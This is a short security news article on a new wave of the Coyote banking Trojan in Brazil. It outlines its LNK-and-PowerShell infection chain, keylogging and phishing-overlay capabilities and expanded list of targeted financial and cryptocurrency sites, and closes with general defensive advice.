A new wave of Coyote malware infections is sweeping across Brazil, posing a serious threat to financial institutions and Windows users. Originally documented by Kaspersky in early 2024, Coyote has evolved into a sophisticated banking Trojan capable of harvesting sensitive data through keylogging, phishing overlays, and system reconnaissance. Recent reports reveal that the malware now targets over 1,030 websites and 73 financial institutions, marking a significant expansion in its operational scope.

The infection chain begins with a Windows Shortcut (LNK) file that executes a PowerShell command, retrieving additional scripts from a remote server. This multi-staged process culminates in the deployment of a malicious payload that establishes persistence by modifying the Windows registry. Once embedded, Coyote can capture keystrokes, take screenshots, and display fake login screens to trick users into divulging credentials. It also scans for installed antivirus software to evade detection.

Coyote’s expanded target list includes major Brazilian financial platforms such as mercadobitcoin.com.br and bitcointrade.com.br, indicating a strategic focus on cryptocurrency and digital banking services. When a victim attempts to access one of these sites, the malware communicates with an attacker-controlled server to determine its next move—whether to activate a keylogger, capture a screenshot, or deploy a phishing overlay.

Security experts warn that Coyote’s use of PowerShell and registry manipulation makes it particularly stealthy, allowing it to bypass traditional endpoint defenses. Its modular design and ability to adapt to different financial environments suggest that it may continue to evolve, potentially spreading beyond Brazil.

Organizations are urged to implement proactive defenses, including disabling unnecessary scripting features, monitoring registry changes, and deploying behavior-based detection tools. As malware campaigns grow more targeted and evasive, financial institutions must remain vigilant to protect customer data and operational integrity.